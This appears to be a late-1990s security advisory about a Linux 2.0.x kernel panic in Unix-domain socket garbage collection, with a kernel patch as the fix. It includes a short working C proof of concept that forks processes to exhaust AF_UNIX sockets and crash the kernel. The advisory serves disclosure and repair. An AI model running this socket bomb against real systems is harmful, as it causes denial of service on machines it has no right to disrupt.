COMMAND
net/unix/garbage.c
SYSTEMS AFFECTED
Linux 2.0.x
PROBLEM
Floody posted following about insufficient allocations in
net/unix/garbage.c Kernels 2.0.x do not sufficiently allocate
space for the internal stack used for garbage collection on unix
domain sockets (It does for the standard system configuration
which is 1024 fd's so only a custom tuned box is vulnerable)
Because the garbage collection system defines a MAX_STACK depth
of 1000 for it's internal use, it is relatively trivial to write a
user-space program which opens up a large number of unix domain
sockets, eventually causing a kernel panic in the garbage
collection routines (which test for this limit and panic if hit);
on systems which have NR_FILE (or /proc/sys/kernel/file-max) set
to a value larger than 1024 or so.
The following illustrates how a user-space program might exploit
this bug, causing a kernel panic:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
void bomb()
{
while(1) {
while(socket(AF_UNIX, SOCK_STREAM, 0) != -1) ;
sleep(5);
}
}
int main()
{
int i;
printf("forking 6 unix socket bomb processes.\n");
fflush(stdout);
for(i = 0; i < 6; i++)
if(fork() == 0) bomb();
bomb();
return 0;
}
This was tested under 2.0.32 and verified the panic. This program
is able to cause a panic on a system which does NOT have
/proc/sys/kernel/file-max > 1024.
SOLUTION
The solution is slightly more complicated than simply increasing
MAX_STACK, due to the fact that a single page is allocated for the
stack, and given an i386 architecture, this can only hold 1024
entries. 2.0.33 should fix this. Also, 2.1.x got fixed that.
For everyone else's benefit, here is a patch. This is only
necessary for 2.0.x kernels, when the maximum number of open
files has been increased beyond 1024 (which is becoming
increasingly common for heavily loaded production servers).
*** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997
--- net/unix/garbage.c Thu Dec 4 02:05:47 1997
***************
*** 5,10 ****
--- 5,20 ----
* Copyright (C) Barak A. Pearlmutter.
* Released under the GPL version 2 or later.
*
+ * 12/3/97 -- Flood
+ * Internal stack is only allocated one page. On systems with NR_FILE
+ * > 1024, this makes it quite easy for a user-space program to open
+ * a large number of AF_UNIX domain sockets, causing the garbage
+ * collection routines to run up against the wall (and panic).
+ * Changed the MAX_STACK to be associated to the system-wide open file
+ * maximum, and use vmalloc() instead of get_free_page() [as more than
+ * one page may be necessary]. As noted below, this should ideally be
+ * done with a linked list.
+ *
* Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem.
* If it doesn't work blame me, it worked when Barak sent it.
*
***************
*** 59,68 ****
/* Internal data structures and random procedures: */
- #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */
static unix_socket **stack; /* stack of objects to mark */
static int in_stack = 0; /* first free entry in stack */
!
extern inline unix_socket *unix_get_socket(struct file *filp)
{
--- 69,77 ----
/* Internal data structures and random procedures: */
static unix_socket **stack; /* stack of objects to mark */
static int in_stack = 0; /* first free entry in stack */
! static int max_stack; /* Calculated in unix_gc() */
extern inline unix_socket *unix_get_socket(struct file *filp)
{
***************
*** 110,116 ****
extern inline void push_stack(unix_socket *x)
{
! if (in_stack == MAX_STACK)
panic("can't push onto full stack");
stack[in_stack++] = x;
}
--- 119,125 ----
extern inline void push_stack(unix_socket *x)
{
! if (in_stack == max_stack)
panic("can't push onto full stack");
stack[in_stack++] = x;
}
***************
*** 151,158 ****
if(in_unix_gc)
return;
in_unix_gc=1;
!
! stack=(unix_socket **)get_free_page(GFP_KERNEL);
/*
* Assume everything is now unmarked
--- 160,173 ----
if(in_unix_gc)
return;
in_unix_gc=1;
!
! max_stack = max_files;
!
! stack=(unix_socket **)vmalloc(max_stack * sizeof(unix_socket **));
! if (!stack) {
! in_unix_gc=0;
! return;
! }
/*
* Assume everything is now unmarked
***************
*** 276,280 ****
in_unix_gc=0;
! free_page((long)stack);
}
--- 291,295 ----
in_unix_gc=0;
! vfree(stack);
}